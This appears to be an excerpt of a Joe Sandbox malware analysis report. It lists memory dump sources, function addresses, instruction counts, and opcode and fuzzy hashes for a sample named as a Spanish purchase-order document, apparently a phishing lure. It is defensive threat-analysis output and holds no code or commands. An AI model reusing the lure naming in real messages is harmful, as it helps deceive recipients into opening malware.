Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62a0cd2a592284d3b08f7757b2410731ba3161f46b8eb79a17e1337aed6b4e19
Instruction ID: 00d74e9774c8bb6ec8a386b3cdbcb1258ae3ca63d5fda9bc8784f5f023b869ff
Opcode Fuzzy Hash: 62a0cd2a592284d3b08f7757b2410731ba3161f46b8eb79a17e1337aed6b4e19
Instruction Fuzzy Hash: DCF0F0313805114B87265A2EC858A2B7BDEEFC9A6535542B9F80DCB3A1DF65CC03C380

Function 0752366F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88774f72062b01f308ba510b733f206726fec898dccc90bb8445d1eeb4ccf5f
Instruction ID: 39777d633316caca44be6e070c64ccfbd7ec155a3a884e093760b578264d353c
Opcode Fuzzy Hash: d88774f72062b01f308ba510b733f206726fec898dccc90bb8445d1eeb4ccf5f
Instruction Fuzzy Hash: 87F0C8713042A28FD6189A39D8589AD379D7F83955706046BE806CF3F1DB15EC02E754

Function 07528B18 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18ca10906a87302b97a8d5ae5bcc9b0c38d21888fb2beff5a5d2be6722aebbd8
Instruction ID: 4d0ff601c464e830be521bd65aa2537c37e3ba5865cdae17a324593c33191f22
Opcode Fuzzy Hash: 18ca10906a87302b97a8d5ae5bcc9b0c38d21888fb2beff5a5d2be6722aebbd8
Instruction Fuzzy Hash: 65014471300B118FD724EF29D41460BB7E6EBC8325F108B1DD16A877A4DF74A8068F91

Function 06B73F16 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8427dd1e0d4db81f9da8b96d426b8c45fcef28fd5dd3c2d6e192f2958068b592
Instruction ID: 860b46e8cd0f171b49cce8d5faaae0b7021c6d5a9e27e0137238f8cf7450f954
Opcode Fuzzy Hash: 8427dd1e0d4db81f9da8b96d426b8c45fcef28fd5dd3c2d6e192f2958068b592
Instruction Fuzzy Hash: DE01BCA160E3C98FD703E770D9642987FB09F17244B0A41CBC189DF1A3D9640E09CB93

Function 02140838 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d29e9059647395500e1651cf52e2dd3dd06938ce078cf3d4573a06c057cd9702
Instruction ID: ca8feed9cb5bb24f0046b91c6463506af7efd5913b3dfe25e8428a00e629a85f
Opcode Fuzzy Hash: d29e9059647395500e1651cf52e2dd3dd06938ce078cf3d4573a06c057cd9702
Instruction Fuzzy Hash: DE110CB4D0020D9FDB41EFF8C554ADEBBB1FF48300F1046A9C115AB265EB355A159F81

Function 0214BA10 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c92a942223d91f81438a4b858d7b3aa29d5c9c678f71ea6a0cd741a47f864fdb
Instruction ID: 0f0aedf0627ff43f7406bda4f4454c9998462ecfb849a84b396bfb775a1b51fc
Opcode Fuzzy Hash: c92a942223d91f81438a4b858d7b3aa29d5c9c678f71ea6a0cd741a47f864fdb
Instruction Fuzzy Hash: AC01F972A08115EFDB11CE599844BEB3B67EBC8750F14807AF919C7240DB35CA12DBA0

Function 06B71020 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a24097634597dd4624317ac055961d52ff92242f38d662670e0f48921ae8f3f4
Instruction ID: 47e257edac90524ec21bf632a13e2ba5a2d21ed0c99fdafbdd866749a71fae08
Opcode Fuzzy Hash: a24097634597dd4624317ac055961d52ff92242f38d662670e0f48921ae8f3f4
Instruction Fuzzy Hash: A5F024313083545FE7095ABD2825B7F3BABCBC7150B18406BE909EB281CD299C0583B6

Function 0752CB80 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e71940c39218c059d3ada262add769ffb6b7eede51b5f9ae39f19a1889310dad
Instruction ID: 5134fb8bb59188c633a7a510da9eeb9932cf67eb3ddbb16daef6a121aa8f5528
Opcode Fuzzy Hash: e71940c39218c059d3ada262add769ffb6b7eede51b5f9ae39f19a1889310dad
Instruction Fuzzy Hash: 71F0F6703103158FE3109628C4847BB33E6FBCA614F408469E646C72A0DEB0EC0397E2

Function 02140848 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0d32e27267af90afead0388019ea5843ad5dd70f415b7ffaa8aa7ac759d7878
Instruction ID: 8d0ea227dd2a60861e82615c471391272dca26e2331c07e0a9c3da5c40d11c09
Opcode Fuzzy Hash: d0d32e27267af90afead0388019ea5843ad5dd70f415b7ffaa8aa7ac759d7878
Instruction Fuzzy Hash: 2C0108B4D0020DEFDB41EFE4D850AAEBBB2FF48300F1085AAC115AB364EB355A159F81

Function 0752D538 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd6921172dec431d94cf000ad0fda5d27e6729ae0431e39082afadbae7beb239
Instruction ID: efa5309cb2a362523be706bc59982db618aa15698eaf0e5895841370d362fa38
Opcode Fuzzy Hash: dd6921172dec431d94cf000ad0fda5d27e6729ae0431e39082afadbae7beb239
Instruction Fuzzy Hash: 23F0F6703043518FD7119728C990BEA37B6AFC6115F0540AAD285C72A1DEB4EC02EBE2

Function 007FD788 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1531834342.00000000007FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7fd000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7fe6cbb2f22a95bfa26965035489bd3e530074f349a35ca2089b82c639c9a24
Instruction ID: 1cae53091c504c8025dfcbe6c128e420a712c8838ad7c99a5081d0d5e7e8abdf
Opcode Fuzzy Hash: f7fe6cbb2f22a95bfa26965035489bd3e530074f349a35ca2089b82c639c9a24
Instruction Fuzzy Hash: 55F06D71445744AFEB208A16DD84B66FB98EF51724F18C45AEE085E286C2B9AC44CAB1

Function 0752D169 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7d0ad55109e938f9a9de8730ffe8d47204337f80a86aa8d8dd29d44a18c3853
Instruction ID: beb769ca1ea3377c42e830c2726959dfd36f1d05fc9df10c20d40b61af14da2f
Opcode Fuzzy Hash: e7d0ad55109e938f9a9de8730ffe8d47204337f80a86aa8d8dd29d44a18c3853
Instruction Fuzzy Hash: 030192B9600214CFCB14DF68D58499C77B1FF49325F254195E915AB7A1C732DD82CF90

Function 0214C350 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e86c1c2053e4577469a275c0fb930c8a75c63232e40d30085f0f0106a5e88411
Instruction ID: b81724d01d4359fec2deb601fbd02ec6b27f64d2deead64407dacc5f5a7b51a8
Opcode Fuzzy Hash: e86c1c2053e4577469a275c0fb930c8a75c63232e40d30085f0f0106a5e88411
Instruction Fuzzy Hash: 3DF09070A862814FE30087789550BAABBD2EB56214F4482AAC0998B656DB798842CBD1

Function 06B71C5F Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bf3a16d4f7bfb06f51ed1d7d4b469a89ef6a30774424cf0fa27159a9b75ea19
Instruction ID: 40e147824b3dc148ea415cb8f5fec411ec680c07acd174380f160b8624314d8b
Opcode Fuzzy Hash: 3bf3a16d4f7bfb06f51ed1d7d4b469a89ef6a30774424cf0fa27159a9b75ea19
Instruction Fuzzy Hash: 12F0A7363082405FC3118619DC54D82FF99EF8A220705809BF584C7762C5209C05C3A5

Function 0752897F Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faeb3b9cbd684cbfcd5c7ab19d1ec62b0569aadd53dd2549c14b73b49e243c5a
Instruction ID: 6acc260fa10a41b54cc1ae63ae2548839071288131d0d63bdc0a2b6b496dc850
Opcode Fuzzy Hash: faeb3b9cbd684cbfcd5c7ab19d1ec62b0569aadd53dd2549c14b73b49e243c5a
Instruction Fuzzy Hash: 4AE080713082541FD705235574186DABBAECBDA265704406FF906D3352DE7D4D0346F5

Function 06B71C20 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 688cabd38ab56c1a914c5b875c72c50112191f9122e86bf57ed9e8d4025d677d
Instruction ID: ae546303d3432f6524983c2ed3926f47fb81354498a946214a8d582b7d55fd1b
Opcode Fuzzy Hash: 688cabd38ab56c1a914c5b875c72c50112191f9122e86bf57ed9e8d4025d677d
Instruction Fuzzy Hash: ACE09271700218AFD3049A9EDC44E6BFBEEFFC9620B21807AF504D7365CAB0AC0086A4

Function 075244E0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f4a98799761e48947508fe55c66a08b16ac4b5a75fbda305dac8a4e3c8539b2
Instruction ID: e787c1c3f2d64d12ea1c9e199ea5989b5fc8a2d3bddb28f1c880fa5137a269fb
Opcode Fuzzy Hash: 5f4a98799761e48947508fe55c66a08b16ac4b5a75fbda305dac8a4e3c8539b2
Instruction Fuzzy Hash: 50F0E5321142508FC711D62CC4C9BD833A5FB4B314F1884F3E146AF225D1316847D795

Function 07522210 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19f6c0aa4090371597f9bf3ba17a8b41577520ac2b766c78d9e1d608810a5496
Instruction ID: 4ef24f7c8429ff5f9ee59555e910075aab1fb7ea5696570834e1dd18e8c14b6c
Opcode Fuzzy Hash: 19f6c0aa4090371597f9bf3ba17a8b41577520ac2b766c78d9e1d608810a5496
Instruction Fuzzy Hash: 18E092772645358BC700DB88F4808B9BBAAF7496693188267E50DCA610D33BDC02C780

Function 06B73F89 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05fff2b61d8cc44c7033b026422c03c92f9eda0bcb481568fed931c99f340235
Instruction ID: 170328d47322e2e8f5c8691623525a2509c3916da6e024351ffe449fb5e89438
Opcode Fuzzy Hash: 05fff2b61d8cc44c7033b026422c03c92f9eda0bcb481568fed931c99f340235
Instruction Fuzzy Hash: 8AE092357002649FD7186B76AA247BE3B67EBC9260F08846DF9469B341CC769C426391

Function 075233F1 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 234211c91c9f2fe210e60d372e01c032151dab38094e4216304db565d1c27a9a
Instruction ID: 2021028da8e09b3d71dc1744fd96349a2a5f2d0be37922595a2be440c3d60832
Opcode Fuzzy Hash: 234211c91c9f2fe210e60d372e01c032151dab38094e4216304db565d1c27a9a
Instruction Fuzzy Hash: 4FE04F62209AB56FDA176318AC242ED3F65AFC3515B0801DAD04A9B6C2CE5C5D1793CA

Function 07522258 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0dd2ecad5d3468f65c8d62f4c5b47ed9dc3fc3a9b1570a9efa62144ae32eeeb
Instruction ID: ac1af903b4831871b9fbf83e57fb1df40e9ec92023c1b18395f09c1e8d3e4a69
Opcode Fuzzy Hash: d0dd2ecad5d3468f65c8d62f4c5b47ed9dc3fc3a9b1570a9efa62144ae32eeeb
Instruction Fuzzy Hash: 5FE0D8754092A49FD7019BA8E4C4AC47FA8FB03311F478093F485875D2D37A9C8797B1

Function 06B71011 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd077f8f902426bac9c72ace106314544348a4382a360f18388f188b4f1740c9
Instruction ID: 5ac3d290fe6b18991656fa124a87f5838a95d0b22e8d100541b34b4edc8279ba
Opcode Fuzzy Hash: dd077f8f902426bac9c72ace106314544348a4382a360f18388f188b4f1740c9
Instruction Fuzzy Hash: 17E0C2B371521017C7082A8DA466BEA3B6ACBDA651F09402BFA15CB280CA65480387E2

Function 0752B347 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 931a5b8c2ef4464fbfd93b5b29a6c901ccc89b8a114c46d78ce2ee4e55fe7b2c
Instruction ID: 3e6e29c5b551042925b17ec92045b4b84cff7f2987e032cddb07e148a12e9395
Opcode Fuzzy Hash: 931a5b8c2ef4464fbfd93b5b29a6c901ccc89b8a114c46d78ce2ee4e55fe7b2c
Instruction Fuzzy Hash: 4FE0CD727092644F6305171824149E93F97DDCAA5570600EBF509E7355DD146C4743D3

Function 06B73F98 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d455084cdea7c7611d16f8031329c12e4f6a48c33d9533fc6c475d24c7625223
Instruction ID: fb28152e37798a9e08e07903011565c97279c75277b267c2520697e484aa4e80
Opcode Fuzzy Hash: d455084cdea7c7611d16f8031329c12e4f6a48c33d9533fc6c475d24c7625223
Instruction Fuzzy Hash: B6E08C357002289BD318667BAA14A3E36ABEBC5660B08C42DF5068B340CCB69C022291

Function 075244EC Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b4fbc1eb250d32cdc551aae72036c39dd5fab7b1327e8e827cbaa00c44d99a9
Instruction ID: 0cc101fc6c556a93ed42b37d1a1a82d635efd172913f1285afb4e5c8f2d51c04
Opcode Fuzzy Hash: 1b4fbc1eb250d32cdc551aae72036c39dd5fab7b1327e8e827cbaa00c44d99a9
Instruction Fuzzy Hash: B3E04F362501108FC715E61CC488BE533A4FB8B355F5949F3F50AEB324D276A8529751

Function 06B71C70 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88aae7ef0d9e301f2d0ce240faffe4b743ba0ce994293bd9d4f3d20ff945f9b2
Instruction ID: 06e9eabfd7d18d64bdf7466dc340645bb9bb34910d260614930b8503eda05de7
Opcode Fuzzy Hash: 88aae7ef0d9e301f2d0ce240faffe4b743ba0ce994293bd9d4f3d20ff945f9b2
Instruction Fuzzy Hash: 3FE08C363001006FC3108A0EEC88D46FBEDEFCD631B10806AFA09C7320CA71EC01C6A4

Function 07528990 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e948bde710222ad1ab19cf203b87fa473b2b0dbc095ade47dcf6a6e3f8a09c6f
Instruction ID: 9bde8f9dc1d307282df0baa933d91166c516d14fe5dfdc1eaf7fa0d851e900d6
Opcode Fuzzy Hash: e948bde710222ad1ab19cf203b87fa473b2b0dbc095ade47dcf6a6e3f8a09c6f
Instruction Fuzzy Hash: D5D05E357001144B9A08336AB42865EF7EFDBD8621704402EEA0AC3381DEAD8D0346E6

Function 0214AD50 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 6825b7896d568d6d880c2bca1a15f4572ad8d77f5971ec6f4700f74b2a3f1306
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 87C012332CC1282AA229108E7C40AA3AA8CC7C16B5A220137F56C932009D429C8041A4

Function 07523400 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ab86984ec2de3b7612401828b3eabee720a6d9d1737f7ffde19e50dd75432eb
Instruction ID: 05bbcbaab38635f2b180f253e34aa0613706d39885a5dcccf5b3a2d03e328211
Opcode Fuzzy Hash: 4ab86984ec2de3b7612401828b3eabee720a6d9d1737f7ffde19e50dd75432eb
Instruction Fuzzy Hash: A3D0C9A270697A67891A32597C252FE2669AFC6911B04006AD00A9A6C1DE4C5E1362CF

Function 06B7BBA0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65c63aba26f44266e26a388c1eaeff01cadf45093d035daded1dcf62c1f16092
Instruction ID: 5a1c3205807ac25a8d01f2a456fbfbfc4c4e6f90a683e4d39b6018c1254f3680
Opcode Fuzzy Hash: 65c63aba26f44266e26a388c1eaeff01cadf45093d035daded1dcf62c1f16092
Instruction Fuzzy Hash: 60E0B670105205CFD7646F79E54892A3776FE5460634510ACEC0682694CF3AAC47EE50

Function 06B73F50 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208d0d431ebdf83df79e2d380b16fc05f48a192b7248336c85ef19a31e7e8353
Instruction ID: 1b0d41e686597e15cf562dbcf9948e94397d7894be981cb880388c9d63f3171a
Opcode Fuzzy Hash: 208d0d431ebdf83df79e2d380b16fc05f48a192b7248336c85ef19a31e7e8353
Instruction Fuzzy Hash: F1D05BB090420CEFDF00EFB4D94195DB7B6EB48244B10459DD40DD7300DA316F05AB91

Function 0214AF1D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4628a2fe049e7bef22effbcbd2d424182d1d6d931baa1ed7b0f68daa8a5d7ab9
Instruction ID: dc6a582b977d931d23315ee1cdd54fb65c0a299dd008ff39e7c4a1bf3dcb9fce
Opcode Fuzzy Hash: 4628a2fe049e7bef22effbcbd2d424182d1d6d931baa1ed7b0f68daa8a5d7ab9
Instruction Fuzzy Hash: F0D0677AB00008EFDB159F98E9409DDB7B6FB98221B048116E915A3261C671AD61DB54

Function 02148340 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03bba5d34a9f468c2b99a1df5a4364f2935c2ec3dc67e8f94b4aaba3d2c56965
Instruction ID: 639a8ccae804c39ce86a6f0ef0464b9d1c2c8d50fc36ba4945f346a0a0aa3a11
Opcode Fuzzy Hash: 03bba5d34a9f468c2b99a1df5a4364f2935c2ec3dc67e8f94b4aaba3d2c56965
Instruction Fuzzy Hash: D0D01271509287CBD302FB35E8584693B22AE8120431885A5E0404B67FEAB9595A9755

Function 02148350 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8b864032a1cc039f0c20adc826a47b3bd2c2ea896da25dececab29af8f640a3
Instruction ID: 85c1d72b767012cf856343f8e4ea39e1e1f339f8d0522dc49e8b00bab99cc562
Opcode Fuzzy Hash: a8b864032a1cc039f0c20adc826a47b3bd2c2ea896da25dececab29af8f640a3
Instruction Fuzzy Hash: 0FC0123000030ECBD601F769F848929332ABAC03047408624E1050777EDF796D5B5791

Function 0214D9E1 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

